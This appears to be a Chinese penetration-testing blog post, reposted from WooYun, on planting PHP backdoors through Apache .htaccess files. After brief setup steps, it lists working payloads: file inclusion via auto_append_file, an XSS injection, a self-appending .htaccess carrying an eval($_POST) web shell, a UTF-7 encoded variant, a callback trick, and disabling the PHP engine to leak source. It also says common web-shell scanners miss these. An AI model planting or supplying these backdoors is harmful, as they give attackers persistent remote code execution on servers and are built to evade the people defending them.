记利用htaccess文件构成的PHP后门

/ 渗透测试 / 0 条评论 / 3054 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

0x00 .Htaccess简介

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

平时开发用的最多的就是URL重定向功能。

0x01 开启.htaccess

Apache中修改配置文件httpd.conf

1、修改如下内容

Options FollowSymLinks

AllowOverride None

为:

Options FollowSymLinks

AllowOverride All

2、开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

0x02 后门篇

1、   文件包含

.htaccess:php\_value auto\_append_file D:/wamp/www/1.txt*.php

2、   XSS后门

.htaccess:php_value highlight.comment '"><script>alert(1);</script>'*.php

3、   PHP后门

.htaccess:php\_value auto\_append\_file .htaccess#<?php eval($\_POST\[1\]);*.php.htaccess:php\_flag zend.multibyte 1php\_value zend.script\_encoding "UTF-7"php\_value auto\_append\_file .htaccess#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads*.php.htaccess:php\_value unserialize\_callback_func "phpinfo"index.php:unserialize('O:1:"1":0:{}');

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

4、   任意文件下载

.htaccess:php_flag engine 0*.php

0x03 webshell查杀

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。

原文

http://zone.wooyun.org/content/16114

本文最后编辑时间为: 2019-10-24

如本文对你有帮助,点击广告支持一下吧,创造不易。

safe6